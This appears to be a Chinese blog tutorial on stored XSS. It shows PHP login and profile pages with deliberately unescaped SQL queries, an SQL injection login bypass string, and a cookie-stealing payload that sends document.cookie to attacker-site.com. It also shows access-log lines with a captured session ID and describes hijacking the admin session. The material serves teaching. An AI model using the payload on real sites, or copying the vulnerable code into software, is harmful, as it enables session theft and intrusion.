XSS学习笔记(二)(存储型XSS,持久型攻击)

最新推荐文章于 2023-11-21 09:44:22 发布
最新推荐文章于 2023-11-21 09:44:22 发布
阅读量1.5k 收藏
点赞数
持久型XSS攻击就是把攻击数据存进数据库,攻击行为就伴随着攻击数据一直存在,下面找来一个利用持久型攻击获取Session ID,同时向浏览器传送一个cookie,(这里科普一下,即使是使用了session验证的方法,还是需要客户端支持cookie), cookie会保存会话连接中的数据,Session ID作为会话标识,浏览器的后续请求就会基于后续请求,攻击者可以提供一个攻击链接,用户点击该链接时,向攻击者自己的服务器发送一条保存有session id 的信息,这样就可以窃取到用户的session id,得到用户的登录权限了。

这里是常见的login.php的代码,大致说下执行流程, 根据user_name查找相应的pass_word,然后将用户提供的password与在数据库里的pass_word进行比较,如果验证通过就建立一个user_name的session:

[php]  view plain copy print ? 在CODE上查看代码片 派生到我的代码片
  1. <?php  
  2. $Host'www.baidu.com';  
  3. $Dbname'app_db';  
  4. $User'you_knows';  
  5. $Password'you_dontknows';  
  6. $Schema = 'test';  
  7.   
  8. $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";  
  9.   
  10. /* Connect with database asking for a new connection*/  
  11. $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);  
  12.   
  13. /* Error checking the connection string */  
  14. if (!$Connect) {  
  15.  echo "Database Connection Failure";  
  16.  exit;  
  17. }  
  18.   
  19. /* 这里就是查询数据的过程,不要学这个,直接就是SQL Injection 的漏洞 ,user_name 都没有 string转义, 直接'1 or '1'='1 就登录了, */  
  20. $query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";  
  21.   
  22. $result=pg_query($Connect,$query);  
  23. $row=pg_fetch_array($result,NULL,PGSQL_ASSOC);  
  24.   
  25. $user_pass = md5($_POST['pass_word']);  
  26. $user_name = $row['user_name'];  
  27.   
  28. if(strcmp($user_pass,$row['password'])!=0) {  
  29.  echo "Login failed";  
  30. }  
  31. else {  
  32.  # Start the session  
  33.  session_start();  
  34.  $_SESSION['USER_NAME'] = $user_name;    /* 建立session 字典对象, 同时在客户端会存有cookie */  
  35.  echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";  
  36. }  
  37. ?>  
这里还有一个home.php的代码,可以根据登录用户是admin 或者是不同的用户,做一个分权的处理,对admin列出功能菜单,对于其他用户,提供包含输入的框的form,可以在数据库插入新的数据:

[php]  view plain copy print ? 在CODE上查看代码片 派生到我的代码片
  1. <?php  
  2. session_start();  
  3. if(!$_SESSION['USER_NAME']) {  
  4.  echo "Need to login";  
  5. }  
  6. else {  
  7.   
  8. /* 其实好的PHP代码的数据库链接类都是应该放在单独的程序里的,不会这么冗余的丢在这  */  
  9. $Host'www.baidu.com';  
  10. $Dbname'app_db';  
  11. $User'you_knows';   
  12. $Password'you_dontknows';  
  13. $Schema = 'test';  
  14.  $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";  
  15.  $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);  
  16.  if($_SERVER['REQUEST_METHOD'] == "POST") {  
  17.    
  18.  /* 在网上找的这段话代码太坑了,这里又是罪恶的不转义拼接,这个在任何时候都是不可取的,不要信任用户的任意输入 */  
  19.   $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";  
  20.   pg_query($Connect,$query);  
  21.   echo "Update Success";  
  22.  }  
  23.  else {  
  24.   if(strcmp($_SESSION['USER_NAME'],'admin')==0) {  
  25.    echo "Welcome admin<br><hr>";  
  26.    echo "List of user's are<br>";  
  27.    $query = "select display_name from $Schema.members where user_name!='admin'";  
  28.    $res = pg_query($Connect,$query);  
  29.    while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {  
  30.     echo "$row[display_name]<br>";  
  31.    }  
  32.  }  
  33.  else {  
  34.    
  35.   /* 在PHP中的语法都是双引号和单引号还有关键括号都需要"\"转义 */  
  36.   echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";  
  37.   echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";  
  38.   echo "<input type=\"submit\" value=\"Update\">";  
  39.  }  
  40. }  
  41. }  
  42. ?>  
攻击者可以通过一个普通用户登录进来,然后在输入框中提交以下数据(在没被过滤的情况下):
[html]  view plain copy print ? 在CODE上查看代码片 派生到我的代码片
  1. <a href=# onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">美女admin </a>  
这样根据home.php的过滤条件,如果是admin账户,就会显示含有"美女admin"的列表,然后如果是点击了"美女admin" 的链接,他cookie就可以被收集到我的服务器上(这里是被动式的触发的漏洞,具有一定的猥琐性),搭建的XSS平台一定也有挺多的简单方法,最简单的就是在Apache的access.log中查看,类似的日志是:
172.29.32.182 - - [17/Apr/2014:15:46:18 +0800] "GET /favicon.ico HTTP/1.1" 404 1675
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "HEAD /qweiop43809442fsfjflr.html HTTP/1.1" 404 -
172.23.10.11 - - [19/Apr/2014:15:20:43 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.110 - - [19/Apr/2014:15:20:43 +0800] "GET  /xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3 200 38          ------ 一次记录的XSS信息,包括目标IP和目标网页以及cookie

有了该攻击者的session-id, 攻击者在会话有效期内即可获得admin的用户权限,并且由于攻击数据已经在数据库,所以只要不删除数据库里的记录,还是会有可能受到攻击,是属于持久性的。其实这里的钓鱼邮件等都是利用这种简单的方法来实现的的,这里的猥琐方法有很多,这里就说这点吧。

lddzjl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【DVWA系列】十XSS(Stored) 存储XSS(源码分析&漏洞利用)
Pluto.的博客
03-13 1018
文章目录DVWAXSS(Reflected) 反射XSS一、Low 级别、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(Reflected) 反射XSS 一、Low 级别 对输入没有进行任何XSS过滤 输入 <script>alert('xss')</script>,js代码执行: 网页源代码,显示的数据是调用数据库里的数据: 源代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) {
XSS 安全漏洞介绍及修复方案
最新发布
墨鸦的博客
06-25 6787
XSS 安全漏洞介绍及修复方案
持久XSS跨站脚本攻击和防御
认知 行动 坚持
07-05 4407
XSS原名CSS(cross-site script), 但与CSS(cascading style sheet)重名,所以就改名为XSS, 今天我们来了解一下XSS攻击和防御。 XSS的本质是:坏人C写了一个恶意js脚本,然后让好人A的浏览器去执行这个恶意js脚本,从而实现对好人A的攻击XSS持久、反射和DOM持久XSS是最好懂的,危害很大,本文会以持久XSS为例,来说明XSS攻击和防御方法。
发掘持久XSS漏洞基础
qq_43776408的博客
10-25 456
持久XSS攻击者将代码永久贮存在服务器上,用户访问该页面就会被攻击 一个很典的场面就是留言板 你所留的言会存储在后台数据库里 你可以在留言板输入<script>alert("XSS")</script>等js代码 然后后台管理员打开留言板时就会触发XSS攻击 如果没有显示出来可能就是你的留言被插入到testarea标签中 所以在你构造攻击代码时需要闭合text...
YXcms-含有存储XSS漏洞的源码包
03-17
存储XSSXSS攻击的一种类,这种漏洞通常发生在用户提交的数据被持久存储在服务器上,并在后续请求中未经适当过滤或转义就被显示出来,从而允许攻击者植入恶意脚本。 【描述解析】 描述中的"亲测真实有效可用...
Catfish(鲶鱼) Blog V1.3.15存储 xss1
08-03
本次讨论的是存储XSS,这类XSS的特点是恶意脚本被持久化地保存在服务器上,通过正常的网页请求即可触发。 ##### 2. 漏洞分析 漏洞发生在`application\index\controller\index.php`文件中的第692行,具体来说是在...
前端安全系列:如何防止XSS攻击
01-27
存储XSS发生在数据被持久存储在服务器上,然后在后续请求中显示给其他用户;反射XSS则依赖于用户点击特制的URL,恶意代码在浏览器中一次性执行;DOM-based XSS则源于JavaScript对动态生成的DOM元素处理不当,...
8、XSS 攻击的防御pdf资料
10-15
2. 存储XSS:这是持久性的,攻击代码被写入数据库或其他持久存储介质中。例如,在留言板上发布含有恶意代码的评论,当其他用户查看这些评论时,恶意脚本将在他们的浏览器中执行。要触发存储XSS攻击者需要...
Web应用安全:存储XSS.pptx
06-18
3. **持久性**:存储XSS的恶意代码存储在服务器,可长时间存在,反复攻击多个用户;反射XSS则是短暂的,每次攻击需重新构造URL。 **相同点** 1. **注入机制**:无论是存储还是反射XSS攻击的核心都是在...
【漏洞学习——XSS】豆瓣某处持久xss
Fly_鹏程万里
02-22 600
漏洞细节 主站个人空间相册..... 还有一个,没什么用的   参见:https://bugs.shuimugan.com/bug/view?bug_no=124719
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1304
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
XSS 存储漏洞解决
qq_33391644的博客
07-21 1345
XSS漏洞修复 网上方案不得不妨看一下,网上方案优化之后的代码
xss存储漏洞问题分析解决
yuanyuan214365的博客
03-26 7460
  背景:1、XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新...
XSS漏洞利用-存储
ChiYanq7ng的博客
11-21 59
留言后添加kali ip 打开http端口。获取cms 网站后台管理员Cookie。管理员账户访问留言管理就出现回弹。
存储XSS漏洞基础
Ethan024的博客
03-11 257
存储XSS漏洞基础 XSS漏洞基础(本文仅供技术学习与分享) 实验准备: 皮卡丘靶场 实验步骤: 存储XSS和反射XSS的原理一样,不同的是,存储XSS攻击者可以将脚本注入到后台保存,构成持久性的危害。 在留言板上输入无害字符串,可以发现输入的内容被一直保存在后台。 输入一些危险字符串,可以看到,后台没有做任何过滤处理,被当做留言输出 在留言板上输入一个简单的弹窗–alert(‘xss’),并且每次刷新都会弹窗。每次访问该页面都会触发payload,加载脚本 ...
实验23:储存xxs漏洞实验演示和讲解
qq_44720671的博客
04-15 486
存储xss漏洞 以pikachu为例,打开存储xss可以看到,这里是个留言板,还有几个上次做sql实验留下来的留言,也就是说,我们提交的留言被后台给存储起来了 我们先试着来提交一些特殊符号,可以在网页的源代码中看到我们提交的东西 然后我们还是使用这个payload: xss的字符会被弹出来,也就意味着我们刚刚提交的留言已经被存储起来了 这个地方因为是被永久的存储起来了,所以我们每次刷新...
第十课 反射XSS漏洞和防御
weixin_30756499的博客
06-18 266
反射XSS漏洞由于这种漏洞需要一个包含Javascript的的请求,这些请求又被反射到提交请求的用户,所以成为反射XSS 实例:动态页面向用户显示消息xxx.com/error.php?message=sorry%2c+an+error+ocurred 判断 xxx.com/error.php?message=<script>alert(‘xss’)</script&gt...
存储XSS攻击:成因、挖掘与防御策略
存储XSS(跨站脚本攻击)是Web安全领域的一种常见漏洞类,它发生在用户的敏感数据在服务器端被恶意编码并持久存储于数据库中,然后在后续的用户访问时被读取并执行。这种攻击形式的特点在于,攻击代码不是临时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值